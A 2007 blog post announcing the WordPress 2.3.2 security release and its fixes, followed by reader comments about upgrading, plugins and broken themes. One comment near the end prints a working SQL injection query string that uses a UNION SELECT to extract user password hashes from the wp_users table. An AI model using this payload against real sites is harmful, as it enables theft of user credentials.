Watch John Chow on the latest episode of MarketLeverageTV!
 

WordPress 2.3.2 Available for Download

written by John Chow on December 29th, 2007

WordPress has just released an urgent security update for the 2.3 series. If you’re blog is powered by WordPress 2.3, then you should upgrade to this latest version right away. The upgrade fixes a security bug that allows people to view your timestamped posts. You may have seen a few posts around Blogsphere showing how to see what Shoemoney is going to post tomorrow. Well, once Shoe upgrades his WordPress, you won’t be able to do that anymore.

WordPress 2.3.2 also suppresses some error messages that can give away information about your database table structure and limits and stops some information leaks in the XML-RPC and APP implementations. There’s also a bonus that allows you to define a custom DB error page. See the full list of changes here.

This is not a major release and as such it will not change your DB structure. Upgrading should be as easy as uploading and replacing the old WordPress files. That’s what I did anyway. You can see a list of full bug fixes here.

Download WordPress 2.3.2

Net Audio Ads The Next Big Thing! said on December 29th, 2007 at 4:16 pm

WordPress Never Stop !!

Reply to this comment
SEO Optimization said on December 29th, 2007 at 8:18 pm

Well at least they do improve and serve us with more secure platform rather than just ignore the bugs.

Reply to this comment
Shaun Carter said on December 29th, 2007 at 4:41 pm

I know that if you know the URL of a post you can view it before it goes live but I didn’t know there was another way.

I better go update now.

Reply to this comment
mahdi yusuf said on December 29th, 2007 at 7:51 pm

does anybody else know, how? it could be cool as a little test

Reply to this comment
Mike Goad said on December 29th, 2007 at 4:45 pm

I noticed the time stamp issue and thought that it shouldn’t work that way, but then just dismissed it. I guess that for the A-list bloggers, it could be detrimental for others to see your post before it’s officially published.

Reply to this comment
Gary R. Hess said on December 29th, 2007 at 4:53 pm

Thanks! I probably wouldn’t have updated until much later if it wasn’t for this post :grin:

Reply to this comment
Nicholas James said on December 29th, 2007 at 4:56 pm

Thanks, i’ll be upgrading my blog shortly. :razz:

Reply to this comment
Dave Starr --- ROI Guy said on December 29th, 2007 at 5:56 pm

Good catch and good explanation, John. Funny, I took more than an hour off to drink coffee and work down the list of un-reads in my feedreader this morning and I didn’t come across anyone else mentioning this until I got to you (saving the best ’til last ;-)).

I highly recommend techie-buzz’s automatic update plug-in. makes these upgrades a snap and also let’s you do backup as part of the process very painlessly. It’s available at:
http://techie-buzz.com/wordpress-plugins/wordpress-automatic-upgrade-plugin.html
for those who hate manual piece by piece updating.

Reply to this comment
Inspired Epiphany said on December 29th, 2007 at 6:46 pm

Thanks for the info John… and thanks for the link to the Wordpress plugin Dave, it’s gonna make updating all my blogs that much faster! :smile:

Reply to this comment
Shirvo Jones said on December 29th, 2007 at 6:00 pm

Good work Mr Chow. I just read it here first! The automatic updater you turned me on to wrks a treat as well. Cheers! :razz:

Reply to this comment
vhxn.com said on December 29th, 2007 at 6:27 pm

Yes I saw on my blog Dashboard about New Version Update i didnt update yet , I wanna do this soon :roll:

Reply to this comment
Mike Huang said on December 29th, 2007 at 6:35 pm

Darn! If only I knew about this earlier, so I could have sneaked into posts ;)

-Mike

Reply to this comment
Blogging Beat said on December 29th, 2007 at 6:44 pm

Dam, I’ve like 6 blogs that will need updating. Thanks for the heads up.

Reply to this comment
vangardx said on December 29th, 2007 at 7:23 pm

use the plugin..it will be easier and fun :D

Reply to this comment
Richard Bizick said on December 29th, 2007 at 7:23 pm

no one can read my timestamped posts :smile:

Reply to this comment
mahdi yusuf said on December 29th, 2007 at 7:49 pm

goooooo wordpress!

Reply to this comment
Joy said on December 29th, 2007 at 8:20 pm

Thanks a lot for the heads up!

Reply to this comment
David Chew said on December 29th, 2007 at 8:34 pm

For people who want to have a full secure on his work or personal detail, upgrading would be a good idea. Thanks for showing us John.

Reply to this comment
Contest Beat said on December 29th, 2007 at 8:50 pm

Thanks for the heads up

Reply to this comment
ImageGag said on December 29th, 2007 at 9:01 pm

Newbie question. I’ve never done this before. Will I lose all of the tweaks, such as custom header, installed widgets, and other stuff that I’ve done?

If so, is there an easy way to get everything back? I just don’t want to end up back at the basic Kubrick design. Thanks a lot.

Reply to this comment
seo audit said on December 30th, 2007 at 12:57 am

No you will not lose those.Made a backup anyway before upgrading.

Reply to this comment
ImageGag said on December 30th, 2007 at 12:01 pm

Will do. Thank you.

Reply to this comment
Steve! said on December 30th, 2007 at 12:29 am

I’m still updating. Heck, I never knew you could see what Shoe was posting, before he posted it.

Reply to this comment
seo audit said on December 30th, 2007 at 12:56 am

Thx for the tip.

Reply to this comment
Etienne Teo said on December 30th, 2007 at 1:08 am

Wordpress just continues to updates and give the best to it’s users.

Reply to this comment
Simon said on December 30th, 2007 at 2:28 am

Thanks for the heads up on this John.

Reply to this comment
Cash Dominator - Money Maker said on December 30th, 2007 at 3:13 am

Thank you for the info about the update. Security is the first. :)

Reply to this comment
Nullamatix said on December 30th, 2007 at 5:37 pm

After the upgrade several of my plug-ins stopped working. Specifically, Brian’s Threaded Comments, and WP-Cache. Anyone else running into this? My comments look terrible now.

Reply to this comment
Dean Saliba said on December 30th, 2007 at 7:49 pm

I know what I did find, my theme no longer displays correctly, I had to go back to 2.3.1 to get it to work properly again.

Reply to this comment
krazl said on December 30th, 2007 at 9:05 pm

Here technical reason documentation.
=== WordPress Charset SQL Injection Vulnerability ===
exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23

Reply to this comment
The Skinny On January said on December 30th, 2007 at 9:51 pm

I don’t know if I’m going to upgrade right away or not. Decisions, decisions.

Reply to this comment
BlackHatDomainer said on December 30th, 2007 at 11:06 pm

Thanks for reporting it, John. My blog jumped from 50 to 200 subscribers today. ;)

Reply to this comment
MoneyNing said on December 31st, 2007 at 9:36 am

For many, they rather people read their timestamp posts since it gives them one more visitors :twisted:

Reply to this comment
GodWin said on January 6th, 2008 at 1:54 am

“If you’re blog is powered by WordPress”

No, I am not a blog.

Reply to this comment

Sorry, the comment form is closed at this time.